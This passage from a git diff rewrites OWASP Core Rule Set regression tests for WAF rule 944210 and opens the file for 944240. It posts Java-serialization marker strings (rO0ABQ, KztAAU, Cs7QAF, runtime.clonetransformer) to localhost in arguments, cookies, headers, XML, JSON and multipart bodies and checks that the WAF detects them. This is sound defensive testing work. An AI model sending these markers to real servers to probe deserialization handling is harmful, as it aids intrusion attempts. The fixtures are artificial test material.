port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - - - test_title: 944210-11 - desc: "Content-Type application/json arg value includes keyword rO0ABQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"rO0ABQ\"}" - output: - log_contains: "id \"944210\"" + Cs7QAF + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-51 + desc: "Content-Type multipart/form-data XML element value includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - - - test_title: 944210-12 - desc: "Content-Type application/json arg name includes keyword rO0ABQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"rO0ABQ\": \"test\"}" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-13 - desc: "Content-Type multipart/form-data json arg name includes keyword rO0ABQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/json\r\n\r\n{\"rO0ABQ\": \"test\"}\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-14 - desc: "Content-Type multipart/form-data json arg value includes keyword rO0ABQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/json\r\n\r\n{\"rO0ABQ\": \"test\"}\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-15 - desc: "Content-Type multipart/form-data XML element value includes keyword rO0ABQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/xml\r\n\r\nrO0ABQ\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-16 - desc: "Content-Type multipart/form-data XML element value includes keyword rO0ABQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/xml\r\n\r\nrO0ABQ\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944210\"" - - - test_title: 944210-17 - desc: "Argument test includes keyword KztAAU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=KztAAU" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-18 - desc: "Argument name includes keyword KztAAU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "KztAAU=test" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-19 - desc: "Cookie test includes keyword KztAAU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=KztAAU - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-20 - desc: "Cookie name includes keyword KztAAU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: KztAAU=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-21 - desc: "Request header test includes keyword KztAAU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: KztAAU - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-22 - desc: "XML element includes keyword KztAAU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944210\"" - - - - test_title: 944210-23 - desc: "XML attribute name includes keyword KztAAU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944210\"" - - - - test_title: 944210-24 - desc: "XML attribute value includes keyword KztAAU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-25 - desc: "XML element value includes keyword KztAAU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "KztAAU" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-26 - desc: "Nested XML element value includes keyword KztAAU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "KztAAU" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-27 - desc: "Content-Type text/plain includes keyword KztAAU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=KztAAU" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-28 - desc: "Content-Type application/json arg value includes keyword KztAAU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"KztAAU\"}" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-29 - desc: "Content-Type application/json arg name includes keyword KztAAU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"KztAAU\": \"test\"}" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-30 - desc: "Content-Type multipart/form-data json arg name includes keyword KztAAU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/json\r\n\r\n{\"KztAAU\": \"test\"}\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-31 - desc: "Content-Type multipart/form-data json arg value includes keyword KztAAU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/json\r\n\r\n{\"KztAAU\": \"test\"}\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-32 - desc: "Content-Type multipart/form-data XML element value includes keyword KztAAU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/xml\r\n\r\nKztAAU\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-33 - desc: "Content-Type multipart/form-data XML element value includes keyword KztAAU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/xml\r\n\r\nKztAAU\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944210\"" - - - test_title: 944210-34 - desc: "Argument test includes keyword Cs7QAF" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=Cs7QAF" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-35 - desc: "Argument name includes keyword Cs7QAF" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "Cs7QAF=test" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-36 - desc: "Cookie test includes keyword Cs7QAF" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Cs7QAF - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-37 - desc: "Cookie name includes keyword Cs7QAF" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Cs7QAF=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-38 - desc: "Request header test includes keyword Cs7QAF" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Cs7QAF - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-39 - desc: "XML element includes keyword Cs7QAF" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944210\"" - - - - test_title: 944210-40 - desc: "XML attribute name includes keyword Cs7QAF" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944210\"" - - - - test_title: 944210-41 - desc: "XML attribute value includes keyword Cs7QAF" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-42 - desc: "XML element value includes keyword Cs7QAF" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "Cs7QAF" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-43 - desc: "Nested XML element value includes keyword Cs7QAF" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "Cs7QAF" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-44 - desc: "Content-Type text/plain includes keyword Cs7QAF" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=Cs7QAF" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-45 - desc: "Content-Type application/json arg value includes keyword Cs7QAF" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"Cs7QAF\"}" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-46 - desc: "Content-Type application/json arg name includes keyword Cs7QAF" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"Cs7QAF\": \"test\"}" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-47 - desc: "Content-Type multipart/form-data json arg name includes keyword Cs7QAF" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/json\r\n\r\n{\"Cs7QAF\": \"test\"}\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-48 - desc: "Content-Type multipart/form-data json arg value includes keyword Cs7QAF" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/json\r\n\r\n{\"Cs7QAF\": \"test\"}\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-49 - desc: "Content-Type multipart/form-data XML element value includes keyword Cs7QAF" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/xml\r\n\r\nCs7QAF\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-50 - desc: "Content-Type multipart/form-data XML element value includes keyword Cs7QAF" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/xml\r\n\r\nCs7QAF\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944210\"" + Cs7QAF + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml index 0a5b47bf16..694069972b 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml @@ -1,2047 +1,1703 @@ --- - meta: - author: "spartantri" - enabled: true - name: "944240.yaml" - description: "Positive tests for rule 944240" - tests: - - - test_title: 944240-0 - desc: "Argument test includes keyword runtime.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - 